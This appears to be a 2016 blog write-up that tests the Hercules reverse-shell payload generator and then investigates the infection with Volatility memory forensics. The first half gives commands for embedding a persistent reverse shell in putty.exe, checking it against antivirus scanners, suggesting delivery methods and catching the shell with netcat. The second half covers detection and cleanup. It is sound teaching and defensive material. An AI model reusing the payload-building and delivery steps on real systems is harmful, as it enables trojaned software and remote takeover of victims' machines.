
Some time ago I tested the Hercules payload generator, collected some information and analyzed the results after the tests with Volatility. This article describes all the steps.

NOTE: This article is about the Hercules version available before 19 July 2016.

Below I describe how to prepare the payload, make it persistent, what happens during execution, and the forensic work, because this payload reveals its presence in the system far too clearly. All tests were done on the popular Windows 7 SP1 x64 with full updates as of July 2016. As you read you will understand why I started Volatility to do some forensic work.

Hercules is described as a payload generator that is undetectable by AV; let's test it.

It is written in Go, so the first step is to install the golang package:

apt-get install golang

Clone the git repo to your workstation:

git clone https://github.com/EgeBalci/Hercules

 

Let's compile it:

cd SOURCE/

go build HERCULES.go

HERCULES.go:13:8: cannot find package "github.com/fatih/color" in any of:

/usr/lib/go-1.6/src/github.com/fatih/color (from $GOROOT)

($GOPATH not set)

Solution:

export GOPATH=$HOME && go get github.com/fatih/color

go build HERCULES.go

 

After compilation completes, let's see how to use it:

SOURCE# ./HERCULES

############################ HERCULES REVERSE SHELL ############################

Usage : ./HERCULES <Local Ip> <Local Port> <options>

Options :

-p Payload to use. ( Windows / Linux )

-a The architecture to use. ( x86, x64 )

-l Specify linking type for compiler. ( static, dynamic )

--persistence Enable outo persistence option for continious acces.

--embed="file.exe" Embed the selected payload with selected exe file.

 

Start with a non-persistent payload embedded into putty.exe, which many people use. You can embed the payload into any executable file; in my variant I used putty:

./HERCULES LISTENER_IP 8443 -p Windows -a x64 -l dynamic --embed="putty.exe" // LISTENER_IP is the attacker machine's IP address, where netcat should listen for the connection from the victim

[*] Payload : Windows

[*] Architecture : amd64

[*] Linker : dynamic

[*] Persistence : Disabled

[*] File Embeding : Payload merged with putty.exe

[+] Payload generated as Payload_putty.exe at ~/Desktop/Hercules/SOURCE

The payload was not generated as Payload_putty.exe, as stated at the end of generation; I found it named Payload.exe.

mv Payload.exe putty8443.exe // named with 8443 so as not to forget which port is used

 

OK, the payload is generated; now let's check whether it is detectable or not. Don't upload the payload to the VirusTotal site, use http://nodistribute.com.

Detected only by McAfee, as a backdoor.

 

A detection rate of 1 of 35 looks good and very useful, but putty.exe grows from 512K to 6.1Mb. An attentive user could notice this and pay attention.

 

-rwxr-xr-x 1 user user 6.1M Jul 15 16:41 putty8443p.exe

-rwxrwxrwx 1 user user 512K Jul 31 2015 putty.exe

 

The next step is to deliver the malicious putty to the victim; how to do it isn't described here, you can use your imagination. For example, replace the downloaded file during the download process with Intercepter-NG, or use social engineering.

Now that we have delivered the payload to our victim, we should wait for the connection, which is established when the user executes our malicious file. Use netcat for it:

 

nc -lp 8443

 

 

During execution of the payload a UAC prompt appears; usually the user doesn't pay attention to it and clicks Allow, and we receive a session:

############################ HERCULES REVERSE SHELL ############################

Microsoft Windows [Version 6.1.7601]

C:\Users\Administrator\Desktop>whoami

win7\administrator

 

The session with the remote workstation can be closed with CTRL+C.

OK, we tested the payload and it works well, but let me make some remarks about it.

First remark:

During execution of the malicious putty.exe (in this example) the end user sees an additional CMD window, and winupdt.exe is spawned in the folder from which putty.exe was executed. This greatly increases the chance that an attentive user notices the malicious actions of this payload and calls the ITSEC department. The user also has to close both cmd.exe and the launched malicious putty.

Second remark:

If netcat isn't listening or isn't reachable from the victim, and the victim executes the malicious putty without a connection to the attacker's listener, many windows (putty + cmd) will be opened. And if you close putty, the process isn't killed and remains visible in the task manager. This greatly increases detection by an attentive user.

 

OK, the next step is to test the persistent payload:

./HERCULES LISTENER_IP 8443 -p Windows -a x64 -l dynamic --persistence --embed="putty.exe" // --persistence makes the payload persist on the victim system after reboot

OK, generated and delivered to the victim; the windows that appear are the same as in the non-persistent variant. Let's check after a reboot.

After reboot and user login, if the listener is available the reverse connection is established. But if the listener isn't available, many windows (cmd + putty) will open, and the payload again spawns winupdt.exe in the directory from which it was executed.

 

Conclusion:

The Hercules payload generator looks good and is really undetectable, but in my opinion it has 3 negative properties:

1) The increase in executable size is too high for small files. For a large file the increase won't be as noticeable.

2) It spawns an additional file in the folder from which the malicious exe was executed.

3) It opens a CMD window, and opens CMD + EXE windows many times when the listener isn't available.

All of these increase the detection rate by the end user.

 

Now let's imagine that the user calls the IT security team and a specialist dumps the memory of the user's workstation to investigate the malicious activity. So, at this moment we lose the connection to the victim's computer =( and switch to the other side, to catch the attacker.

A short how-to for dumping memory from a VirtualBox guest VM (in my test Windows is virtualized):

Start the guest with the command:

virtualbox --dbg --startvm win7 // win7 is the name of the virtual machine in VirtualBox

In the Debug menu, open Command line and enter: .pgmphystofile win7dump

Wait for the memory to be dumped...

Successfully saved physical memory to 'win7dump'.

This dump is located in the home folder of the user who started VirtualBox with sudo.

You can find an article about VirtualBox on Kali Linux here.

 

OK, memory is dumped (in our example from a virtual machine), the workstation is disconnected from the network, and the IT security team starts to analyze what happened.

I will use the Volatility framework, see https://github.com/volatilityfoundation/volatility for more information.

The main goal is to find out why cmd was opened after opening putty, and to find the files, registry hives and network connections that could explain what happened.

 

Start by viewing the process list for suspicious processes:

volatility -f win7dump --profile Win7SP1x64 pslist

Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit

------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------

0xfffffa800370f4a0 winupdt.exe 2732 2372 1 77 1 1 2016-07-18 07:19:57 UTC+0000

volatility -f win7dump --profile Win7SP1x64 pstree

.. 0xfffffa80036e3b10:cmd.exe 2372 2076 1 23 2016-07-18 07:19:56 UTC+0000

... 0xfffffa800370f4a0:winupdt.exe 2732 2372 1 77 2016-07-18 07:19:57 UTC+0000

volatility -f win7dump --profile Win7SP1x64 cmdline

cmd.exe pid: 2372

Command line : cmd /C winupdt.exe

OK, winupdt.exe was executed via cmd /C, which is the black CMD window we saw (see the screenshot above).

 

Let's try to find whether any network connection is linked with this file:

volatility -f win7dump --profile Win7SP1x64 netscan | grep winupdt.exe

No results, so we need to collect more information.

 

Check the loaded DLLs for each process and look for anything suspicious:

volatility -f win7dump --profile Win7SP1x64 dlllist

windll.exe pid: 2076

Command line : "C:\Users\Administrator\AppData\Roaming\Windows\windll.exe"

Service Pack 1

Base Size LoadCount Path

------------------ ------------------ ------------------ ----

0x0000000000400000 0x62a000 0xffff C:\Users\Administrator\AppData\Roaming\Windows\windll.exe

0x0000000077260000 0x1aa000 0xffff C:\Windows\SYSTEM32\ntdll.dll

0x0000000077040000 0x11f000 0xffff C:\Windows\system32\kernel32.dll

0x000007fefd310000 0x6a000 0xffff C:\Windows\system32\KERNELBASE.dll

0x000007feff000000 0xdb000 0xffff C:\Windows\system32\advapi32.dll

0x000007fefd7d0000 0x9f000 0xffff C:\Windows\system32\msvcrt.dll

0x000007fefdc90000 0x1f000 0xffff C:\Windows\SYSTEM32\sechost.dll

0x000007fefd630000 0x12d000 0xffff C:\Windows\system32\RPCRT4.dll

0x000007fefeed0000 0x4d000 0xffff C:\Windows\system32\ws2_32.dll

0x000007fefdde0000 0x8000 0xffff C:\Windows\system32\NSI.dll

0x000007fefc7e0000 0x18000 0x1 C:\Windows\system32\CRYPTSP.dll

0x000007fefc4e0000 0x47000 0x1 C:\Windows\system32\rsaenh.dll

0x000007fefce40000 0xf000 0x1 C:\Windows\system32\CRYPTBASE.dll

0x000007fefe120000 0xd8a000 0x1 C:\Windows\system32\shell32.dll

0x000007fefdcb0000 0x71000 0x1 C:\Windows\system32\SHLWAPI.dll

0x000007fefd760000 0x67000 0x17 C:\Windows\system32\GDI32.dll

0x0000000077160000 0xfa000 0x19 C:\Windows\system32\USER32.dll

0x000007fefddd0000 0xe000 0x6 C:\Windows\system32\LPK.dll

0x000007fefdb40000 0xca000 0x6 C:\Windows\system32\USP10.dll

0x000007fefdb10000 0x2e000 0x2 C:\Windows\system32\IMM32.DLL

0x000007fefd870000 0x109000 0x1 C:\Windows\system32\MSCTF.dll

0x000007fefc780000 0x55000 0x3 C:\Windows\system32\mswsock.dll

0x000007fefc120000 0x7000 0x1 C:\Windows\System32\wshtcpip.dll

0x000007fefc770000 0x7000 0x1 C:\Windows\System32\wship6.dll

0x000007fefcde0000 0x57000 0xffff C:\Windows\system32\apphelp.dll

 

cmd.exe pid: 2372

Command line : cmd /C winupdt.exe

Service Pack 1

Base Size LoadCount Path

------------------ ------------------ ------------------ ----

0x0000000049f30000 0x59000 0xffff C:\Windows\system32\cmd.exe

0x0000000077260000 0x1aa000 0xffff C:\Windows\SYSTEM32\ntdll.dll

0x0000000077040000 0x11f000 0xffff C:\Windows\system32\kernel32.dll

0x000007fefd310000 0x6a000 0xffff C:\Windows\system32\KERNELBASE.dll

0x000007fefd7d0000 0x9f000 0xffff C:\Windows\system32\msvcrt.dll

0x000007fefb0e0000 0x8000 0xffff C:\Windows\system32\WINBRAND.dll

0x0000000077160000 0xfa000 0xffff C:\Windows\system32\USER32.dll

0x000007fefd760000 0x67000 0xffff C:\Windows\system32\GDI32.dll

0x000007fefddd0000 0xe000 0xffff C:\Windows\system32\LPK.dll

0x000007fefdb40000 0xca000 0xffff C:\Windows\system32\USP10.dll

0x000007fefdb10000 0x2e000 0x2 C:\Windows\system32\IMM32.DLL

0x000007fefd870000 0x109000 0x1 C:\Windows\system32\MSCTF.dll

0x000007fefcde0000 0x57000 0xffff C:\Windows\system32\apphelp.dll

 

We found the process windll.exe with pid 2076 (the parent of cmd.exe), with its file located at C:\Users\Administrator\AppData\Roaming\Windows\windll.exe.

Let's check its network connections:

volatility -f win7dump --profile Win7SP1x64 netscan | grep windll.exe

0x7db73010 TCPv4 VICTIM_IP:49163 LISTENER_IP:8443 ESTABLISHED 2076 windll.exe

So a suspicious IP address is found and we realize that this was an attack. Boot the victim's workstation in an isolated (jail) network and collect network traffic: the connection to LISTENER_IP is attempted again, just as seen in the memory dump.

Check the possible locations of windll.exe:

volatility -f win7dump --profile Win7SP1x64 filescan | grep windll.exe

0x000000007d709810 22 0 R--r-d \Device\HarddiskVolume2\Users\Administrator\AppData\Roaming\Windows\windll.exe

 

In persistent mode, a registry key that loads it is located at:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run with data:

WinDll REG_SZ C:\Users\Administrator\AppData\Roaming\Windows\windll.exe
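As an added defender-side example (not from the post and not part of Volatility), the following Python correlates the pstree, cmdline and netscan output shown above to flag the chain found in this investigation: a binary running from a user-profile path, cmd.exe used as a launcher via cmd /C, and an established session held by that binary. The sample lines are constructed to mirror the post's output; the windll.exe pstree entry (offset, parent pid) and both IP addresses are made up.

```python
# Added example (not from the post or Volatility): correlate pstree, cmdline and
# netscan text output to flag the launcher chain found in this investigation.
import re

# Constructed sample lines mirroring the post's output; the windll.exe pstree
# entry (offset, parent pid) and both IP addresses are made up.
PSTREE = """\
. 0xfffffa8003600000:windll.exe 2076 1480 2 90 2016-07-18 07:19:50 UTC+0000
.. 0xfffffa80036e3b10:cmd.exe 2372 2076 1 23 2016-07-18 07:19:56 UTC+0000
... 0xfffffa800370f4a0:winupdt.exe 2732 2372 1 77 2016-07-18 07:19:57 UTC+0000
"""
CMDLINE = """\
windll.exe pid: 2076
Command line : "C:\\Users\\Administrator\\AppData\\Roaming\\Windows\\windll.exe"
cmd.exe pid: 2372
Command line : cmd /C winupdt.exe
"""
NETSCAN = "0x7db73010 TCPv4 192.0.2.10:49163 198.51.100.5:8443 ESTABLISHED 2076 windll.exe\n"
PSTREE_RE = re.compile(r"^\.*\s*0x[0-9a-f]+:(\S+)\s+(\d+)\s+(\d+)", re.M)
CMDLINE_RE = re.compile(r"^(\S+) pid:\s*(\d+)\nCommand line : (.*)$", re.M)
NETSCAN_RE = re.compile(r"^0x[0-9a-f]+\s+(\w+)\s+\S+:\d+\s+(\S+):(\d+)\s+(\S+)\s+(\d+)\s+(\S+)", re.M)
USER_PATH = re.compile(r"\\AppData\\Roaming\\", re.I)  # user-writable; odd for a "system" binary

def parse_pstree(text):
    """{pid: (name, ppid)} from the dot-indented pstree lines."""
    return {int(p): (n, int(pp)) for n, p, pp in PSTREE_RE.findall(text)}

def parse_cmdline(text):
    """{pid: command line} from the two-line cmdline records."""
    return {int(p): c.strip() for _, p, c in CMDLINE_RE.findall(text)}

def parse_netscan(text):
    """[(proto, remote_ip, remote_port, state, pid, owner), ...] from netscan."""
    return [(pr, ip, int(pt), st, int(pid), ow) for pr, ip, pt, st, pid, ow in NETSCAN_RE.findall(text)]

def triage(pstree=PSTREE, cmdline=CMDLINE, netscan=NETSCAN):
    """Return human-readable findings in the order: paths, launcher chains, sessions."""
    tree, cmds, out = parse_pstree(pstree), parse_cmdline(cmdline), []
    for pid, cmd in cmds.items():
        if USER_PATH.search(cmd):
            out.append(f"pid {pid} runs from a user profile path: {cmd}")
    for pid, (name, ppid) in tree.items():
        parent = tree.get(ppid, ("?", 0))[0]
        if parent.lower() == "cmd.exe" and cmds.get(ppid, "").lower().startswith("cmd /c"):
            grandparent = tree.get(tree[ppid][1], ("?", 0))[0]
            out.append(f"{grandparent} -> cmd /C -> {name} (pid {pid}): shell used as a launcher")
    for proto, ip, port, state, pid, owner in parse_netscan(netscan):
        if state == "ESTABLISHED" and USER_PATH.search(cmds.get(pid, "")):
            out.append(f"{owner} (pid {pid}) holds {proto} session to {ip}:{port}")
    return out
```

On a real dump, feed the script the saved text output of the three plugins instead of the constructed strings; a binary under AppData\Roaming that both launches cmd /C and holds an outbound session is exactly the pattern found above.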

 

So now we understand that this is malicious software that establishes a reverse connection to the attacker's IP address, and we need to clean the user's workstation:

To clean it, delete everything: winupdt.exe, windll.exe and the registry record.

 

Memory forensics cheat sheet by SANS: http://forensicmethods.com/wp-content/uploads/2012/04/Memory-Forensics-Cheat-Sheet-v1.pdf

 

P.S. Not all actions done with Volatility are shown in this article, and the output is cut to show only the important/interesting information. You can read about it here.

P.S. An update: Hercules released a new version on 19 July 2016, and this article is about the old version. So next time I will try to do the same with the new version, if it still does such noticeable things =)

 
